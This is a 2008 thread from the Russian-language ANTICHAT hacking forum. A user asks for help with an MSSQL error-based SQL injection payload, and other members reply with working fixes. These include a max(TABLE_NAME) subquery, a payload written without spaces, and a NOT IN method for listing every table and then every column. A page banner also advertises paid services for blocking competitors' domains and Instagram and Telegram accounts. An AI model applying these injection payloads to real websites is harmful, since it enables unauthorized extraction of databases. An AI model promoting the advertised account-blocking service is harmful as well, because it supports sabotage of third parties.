УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
mssql inj help

Страница 1 из 7

Последняя »

Опции темы

Поиск в этой теме

Опции просмотра

mssql inj help

22.03.2008, 13:58

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

Отправить сообщение для -=megahertz=- с помощью ICQ

mssql inj help

При таком запросе
"1+or+1=(SELECT+1+TOP+TABLE_NAME+FROM+INFORMATION_ SCHEMA.TABLES)--"
показывает
Incorrect syntax near the keyword 'TOP'

в чем моя ошибка?

22.03.2008, 14:10

~~~X3RiX~~~

Banned

Регистрация: 14.03.2008

Сообщений: 36

Провел на форуме:
285523

Репутация: 9

юзай

http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/

22.03.2008, 14:12

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

"1+or+1=(SELECT+1+max(TABLE_NAME)+FROM+INFORMATION _SCHEMA.TABLES)--"

22.03.2008, 15:08

Scipio

Members of Antichat - Level 5

Регистрация: 02.11.2006

Сообщений: 781

Провел на форуме:
5939734

Репутация: 1917

Отправить сообщение для Scipio с помощью ICQ

можно проинжектить запрос вобще без использования пробелов:
or(1=(select(max(table_name))from[information_schema].tables))

[ cash ]

__________________
Карфаген должен быть разрушен...

22.03.2008, 15:31

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

спасиб онотолий, помогло

22.03.2008, 16:24

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

снова я
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments')))--
выводит
'syssegments'
делаю так
1+or+1=((select((table_name))from[information_schema].tables+where+TABLE_NAME+NOT+IN+('syssegments','sy ssegments')))--
выводит
'syssegmentssyssegments'
в след запросе выводит уже
'syssegmentssyssegmentssyssegmentssyssegments'
и т.д.

22.03.2008, 16:39

ReVOLVeR

Участник форума

Регистрация: 02.09.2006

Сообщений: 176

Провел на форуме:
645316

Репутация: 327

TABLE_NAME+NOT+IN+('syssegments','sy ssegments','syssegmentssyssegments'...итд)))--
таким образом узнаёш все таблицы))
патом также только для столбцов и формеруеш запрос к бд))

22.03.2008, 16:42

-=megahertz=-

Участник форума

Регистрация: 23.05.2007

Сообщений: 103

Провел на форуме:
380957

Репутация: 56

я знаю что так надо
просто проблема в том что он просто делат так
syssegments
syssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegments
syssegmentssyssegmentssyssegmentssyssegmentssysseg mentssyssegments
...
так не должно быть